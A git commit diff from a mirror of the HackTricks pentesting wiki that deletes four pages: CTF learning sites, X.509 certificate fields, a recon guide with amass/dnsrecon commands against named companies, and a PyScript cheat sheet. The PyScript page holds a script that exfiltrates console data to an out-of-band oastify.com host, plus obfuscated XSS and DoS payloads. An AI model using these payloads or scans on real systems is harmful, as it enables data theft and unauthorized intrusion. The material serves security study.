mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
clean
This commit is contained in:
parent
a2f736a3b8
commit
64c513aaba
4 changed files with 0 additions and 642 deletions
|
@ -1,51 +0,0 @@
|
||||||
# Learning Pages and VMs
|
|
||||||
|
|
||||||
# https://tryhackme.com/
|
|
||||||
|
|
||||||
Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# https://www.root-me.org/
|
|
||||||
|
|
||||||
Rootme is another page for online hosted virtual machines to hack.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# https://www.vulnhub.com/
|
|
||||||
|
|
||||||
Vulnhub has machines to download and then to hack
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue
|
|
||||||
|
|
||||||
Hackthebox has online machines to hack, but there are very limited in the free version.
|
|
||||||
|
|
||||||
Recently the launched their academy, but it is a bit more expensive than for example tryhackme and has less.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# https://hack.me/
|
|
||||||
|
|
||||||
This site seems to be a community platform
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# https://www.hacker101.com/
|
|
||||||
|
|
||||||
Free and smale site with videos and CTFs
|
|
||||||
|
|
||||||
|
|
||||||
# https://crackmes.one/
|
|
||||||
|
|
||||||
This site has a lot of binarys for forensic learning.
|
|
||||||
|
|
||||||
# https://overthewire.org/wargames/
|
|
||||||
|
|
||||||
The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games.
|
|
||||||
Perfect for beginners.
|
|
||||||
|
|
||||||
# https://www.hackthissite.org/missions/basic/
|
|
||||||
|
|
||||||
# https://attackdefense.com/
|
|
|
@ -1,96 +0,0 @@
|
||||||
# PyScript Pentesting Guide
|
|
||||||
PyScript is a new framework developed for integrating Python in the HTML so, it can be used alongside HTML. In this cheat sheet you'll find how to use the PyScript for your penetration testing purposes.
|
|
||||||
|
|
||||||
## Dumping / Retrieving files from the Emscripten virtual memory filesystem:
|
|
||||||
<small>`CVE ID: CVE-2022-30286`</small>
|
|
||||||
<br><br>
|
|
||||||
Code:
|
|
||||||
```
|
|
||||||
<py-script>
|
|
||||||
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
|
|
||||||
out = fin.read()
|
|
||||||
print(out)
|
|
||||||
</py-script>
|
|
||||||
```
|
|
||||||
|
|
||||||
Result:
|
|
||||||
|
|
||||||
![image](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)
|
|
||||||
|
|
||||||
## [OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)](https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript)
|
|
||||||
<small>`CVE ID: CVE-2022-30286`</small>
|
|
||||||
<br><br>
|
|
||||||
Code:
|
|
||||||
```
|
|
||||||
<py-script>
|
|
||||||
x = "CyberGuy"
|
|
||||||
if x == "CyberGuy":
|
|
||||||
with open('/lib/python3.10/asyncio/tasks.py') as output:
|
|
||||||
contents = output.read()
|
|
||||||
print(contents)
|
|
||||||
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
|
|
||||||
</py-script>
|
|
||||||
```
|
|
||||||
|
|
||||||
Result:
|
|
||||||
|
|
||||||
![image](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
|
|
||||||
|
|
||||||
## Cross Site Scripting (Ordinary)
|
|
||||||
|
|
||||||
Code:
|
|
||||||
```
|
|
||||||
<py-script>
|
|
||||||
print("<img src=x onerror='alert(document.domain)'>")
|
|
||||||
</py-script>
|
|
||||||
```
|
|
||||||
|
|
||||||
Result:
|
|
||||||
|
|
||||||
![image](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
|
|
||||||
|
|
||||||
## Cross Site Scripting (Python Obfuscated)
|
|
||||||
|
|
||||||
Code:
|
|
||||||
```
|
|
||||||
<py-script>
|
|
||||||
sur = "\u0027al";fur = "e";rt = "rt"
|
|
||||||
p = "\x22x$$\x22\x29\u0027\x3E"
|
|
||||||
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
|
|
||||||
e = "c\u003d";q = "x"
|
|
||||||
y = "o";m = "ner";z = "ror\u003d"
|
|
||||||
|
|
||||||
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
|
|
||||||
</py-script>
|
|
||||||
```
|
|
||||||
|
|
||||||
Result:
|
|
||||||
|
|
||||||
![image](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)
|
|
||||||
|
|
||||||
## Cross Site Scripting (JavaScript Obfuscation)
|
|
||||||
|
|
||||||
Code:
|
|
||||||
```
|
|
||||||
<py-script>
|
|
||||||
print("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
|
|
||||||
</py-script>
|
|
||||||
```
|
|
||||||
|
|
||||||
Result:
|
|
||||||
|
|
||||||
![image](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)
|
|
||||||
|
|
||||||
## DoS attack (Infinity loop)
|
|
||||||
|
|
||||||
Code:
|
|
||||||
```
|
|
||||||
<py-script>
|
|
||||||
while True:
|
|
||||||
print(" ")
|
|
||||||
</py-script>
|
|
||||||
```
|
|
||||||
|
|
||||||
Result:
|
|
||||||
|
|
||||||
![image](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
|
|
|
@ -1,94 +0,0 @@
|
||||||
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
||||||
|
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
||||||
|
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
|
|
||||||
# What is a Certificate
|
|
||||||
|
|
||||||
In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
|
|
||||||
|
|
||||||
In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) \(PKI\) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate_authority) \(CA\), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web_of_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate.
|
|
||||||
|
|
||||||
The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
|
|
||||||
|
|
||||||
# x509 Common Fields
|
|
||||||
|
|
||||||
* **Version Number:** Version of x509 format.
|
|
||||||
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
|
|
||||||
* **Subject**: The entity a certificate belongs to: a machine, an individual, or an organization.
|
|
||||||
* **Common Name**: Domains affected by the certificate. Can be 1 or more and can contain wildcards.
|
|
||||||
* **Country \(C\)**: Country
|
|
||||||
* **Distinguished name \(DN\)**: The whole subject: `C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net`
|
|
||||||
* **Locality \(L\)**: Local place
|
|
||||||
* **Organization \(O\)**: Organization name
|
|
||||||
* **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\).
|
|
||||||
* **State or Province \(ST, S or P\)**: List of state or province names
|
|
||||||
* **Issuer**: The entity that verified the information and signed the certificate.
|
|
||||||
* **Common Name \(CN\)**: Name of the certificate authority
|
|
||||||
* **Country \(C\)**: Country of the certificate authority
|
|
||||||
* **Distinguished name \(DN\)**: Distinguished name of the certificate authority
|
|
||||||
* **Locality \(L\)**: Local place where the organisation can be found.
|
|
||||||
* **Organization \(O\)**: Organisation name
|
|
||||||
* **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\).
|
|
||||||
* **Not Before**: The earliest time and date on which the certificate is valid. Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock_skew#On_a_network) problems.
|
|
||||||
* **Not After**: The time and date past which the certificate is no longer valid.
|
|
||||||
* **Public Key**: A public key belonging to the certificate subject. \(This is one of the main parts as this is what is signed by the CA\)
|
|
||||||
* **Public Key Algorithm**: Algorithm used to generate the public key. Like RSA.
|
|
||||||
* **Public Key Curve**: The curve used by the elliptic curve public key algorithm \(if apply\). Like nistp521.
|
|
||||||
* **Public Key Exponent**: Exponent used to derive the public key \(if apply\). Like 65537.
|
|
||||||
* **Public Key Size**: The size of the public key space in bits. Like 2048.
|
|
||||||
* **Signature Algorithm**: The algorithm used to sign the public key certificate.
|
|
||||||
* **Signature**: A signature of the certificate body by the issuer's private key.
|
|
||||||
* **x509v3 extensions**
|
|
||||||
* **Key Usage**: The valid cryptographic uses of the certificate's public key. Common values include digital signature validation, key encipherment, and certificate signing.
|
|
||||||
* In a Web certificate this will appear as a _X509v3 extension_ and will have the value `Digital Signature`
|
|
||||||
* **Extended Key Usage**: The applications in which the certificate may be used. Common values include TLS server authentication, email protection, and code signing.
|
|
||||||
* In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication`
|
|
||||||
* **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**.
|
|
||||||
* **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example \(the last par of the chain\).
|
|
||||||
* **Subject Key Identifier** \(SKI\): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** \(AKI\) extension on issued certificates. It's the hash of the subject public key.
|
|
||||||
* **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key.
|
|
||||||
* **Authority Information Access** \(AIA\): This extension contains at most two types of information :
|
|
||||||
* Information about **how to get the issuer of this certificate** \(CA issuer access method\)
|
|
||||||
* Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\).
|
|
||||||
* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
|
|
||||||
|
|
||||||
## Difference between OSCP and CRL Distribution Points
|
|
||||||
|
|
||||||
**OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.
|
|
||||||
**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.
|
|
||||||
From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm#:~:text=OCSP%20%28RFC%202560%29%20is%20a,to%20download%20the%20entire%20CRL.&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.).
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
||||||
|
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
||||||
|
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
|
|
|
@ -1,401 +0,0 @@
|
||||||
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
||||||
|
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
||||||
|
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
|
|
||||||
{% hint style="danger" %}
|
|
||||||
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?
|
|
||||||
[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
|
|
||||||
{% endhint %}
|
|
||||||
|
|
||||||
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, - **Join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
|
|
||||||
|
|
||||||
# Assets discoveries
|
|
||||||
|
|
||||||
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
|
|
||||||
|
|
||||||
The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to:
|
|
||||||
|
|
||||||
1. Find the acquisitions of the main company, this will give us the companies inside the scope.
|
|
||||||
2. Find the ASN \(if any\) of each company, this will give us the IP ranges owned by each company
|
|
||||||
3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\)
|
|
||||||
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets \(the `ssl` trick can be done recursively\).
|
|
||||||
|
|
||||||
## Acquisitions
|
|
||||||
|
|
||||||
First of all, we need to know which **other companies are owned by the main company**.
|
|
||||||
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.
|
|
||||||
Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**.
|
|
||||||
|
|
||||||
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
|
|
||||||
|
|
||||||
## ASNs
|
|
||||||
|
|
||||||
An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**.
|
|
||||||
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
|
|
||||||
|
|
||||||
It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.
|
|
||||||
You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**.
|
|
||||||
Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link**.
|
|
||||||
|
|
||||||
```bash
|
|
||||||
#You can try "automate" this with amass, but it's not very recommended
|
|
||||||
amass intel -org tesla
|
|
||||||
amass intel -asn 8911,50313,394161
|
|
||||||
```
|
|
||||||
|
|
||||||
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com/) \(it has free API\).
|
|
||||||
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com/).
|
|
||||||
|
|
||||||
## Looking for vulnerabilities
|
|
||||||
|
|
||||||
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts.
|
|
||||||
Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**.
|
|
||||||
Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
|
|
||||||
|
|
||||||
# Domains
|
|
||||||
|
|
||||||
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
|
|
||||||
|
|
||||||
_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._
|
|
||||||
|
|
||||||
First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
|
|
||||||
|
|
||||||
## Reverse DNS
|
|
||||||
|
|
||||||
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\)
|
|
||||||
|
|
||||||
```bash
|
|
||||||
dnsrecon -r <DNS Range> -n <IP_DNS> #DNS reverse of all of the addresses
|
|
||||||
dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns
|
|
||||||
dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns
|
|
||||||
dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
|
|
||||||
```
|
|
||||||
|
|
||||||
For this to work, the administrator has to enable manually the PTR.
|
|
||||||
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/)
|
|
||||||
|
|
||||||
## Reverse Whois \(loop\)
|
|
||||||
|
|
||||||
Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\).
|
|
||||||
You can use online tools like:
|
|
||||||
|
|
||||||
* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free**
|
|
||||||
* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free**
|
|
||||||
* [https://www.reversewhois.io/](https://www.reversewhois.io/) - **Free**
|
|
||||||
* [https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API.
|
|
||||||
* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free
|
|
||||||
* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free \(only **100 free** searches\)
|
|
||||||
* [https://www.domainiq.com/](https://www.domainiq.com/) - Not Free
|
|
||||||
|
|
||||||
You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)\(requires a whoxy API key\).
|
|
||||||
You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
|
|
||||||
|
|
||||||
**Note that you can use this technique to discover more domain names every time you find a new domain.**
|
|
||||||
|
|
||||||
## Trackers
|
|
||||||
|
|
||||||
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.
|
|
||||||
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
|
|
||||||
|
|
||||||
There are some pages that let you search by these trackers and more:
|
|
||||||
|
|
||||||
* [**BuiltWith**](https://builtwith.com/)
|
|
||||||
* [**Sitesleuth**](https://www.sitesleuth.io/)
|
|
||||||
* [**Publicwww**](https://publicwww.com/)
|
|
||||||
* [**SpyOnWeb**](http://spyonweb.com/)
|
|
||||||
|
|
||||||
## **Favicon**
|
|
||||||
|
|
||||||
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt
|
|
||||||
python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
|
|
||||||
```
|
|
||||||
|
|
||||||
![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg)
|
|
||||||
|
|
||||||
Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target.
|
|
||||||
|
|
||||||
## Other ways
|
|
||||||
|
|
||||||
**Note that you can use this technique to discover more domain names every time you find a new domain.**
|
|
||||||
|
|
||||||
### Shodan
|
|
||||||
|
|
||||||
As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
|
|
||||||
|
|
||||||
You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"`
|
|
||||||
|
|
||||||
### Google
|
|
||||||
|
|
||||||
Go to the main page an find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other browsers to find possible new domains/pages.
|
|
||||||
|
|
||||||
### Assetfinder
|
|
||||||
|
|
||||||
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
|
|
||||||
|
|
||||||
## Looking for vulnerabilities
|
|
||||||
|
|
||||||
Check for some [domain takeover](pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let know the company.
|
|
||||||
|
|
||||||
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
|
|
||||||
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
|
|
||||||
|
|
||||||
# Subdomains
|
|
||||||
|
|
||||||
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
|
|
||||||
|
|
||||||
It's time to find all the possible subdomains of each found domain.
|
|
||||||
|
|
||||||
## DNS
|
|
||||||
|
|
||||||
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\).
|
|
||||||
|
|
||||||
```bash
|
|
||||||
dnsrecon -a -d tesla.com
|
|
||||||
```
|
|
||||||
|
|
||||||
## OSINT
|
|
||||||
|
|
||||||
The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
|
|
||||||
|
|
||||||
A really good place to search for subdomains is [https://crt.sh/](https://crt.sh/).
|
|
||||||
|
|
||||||
The most used tools are [**Amass**](https://github.com/OWASP/Amass)**,** [**subfinder**](https://github.com/projectdiscovery/subfinder)**,** [**findomain**](https://github.com/Edu4rdSHL/findomain/)**,** [**OneForAll**](https://github.com/shmilylty/OneForAll/blob/master/README.en.md)**,** [**assetfinder**](https://github.com/tomnomnom/assetfinder)**,** [**Sudomy**](https://github.com/Screetsec/Sudomy)**.** I would recommend to start using them configuring the API keys, and then start testing other tools or possibilities.
|
|
||||||
|
|
||||||
```bash
|
|
||||||
amass enum [-active] [-ip] -d tesla.com
|
|
||||||
./subfinder-linux-amd64 -d tesla.com [-silent]
|
|
||||||
./findomain-linux -t tesla.com [--quiet]
|
|
||||||
python3 oneforall.py --target tesla.com [--dns False] [--req False] run
|
|
||||||
assetfinder --subs-only <domain>
|
|
||||||
```
|
|
||||||
|
|
||||||
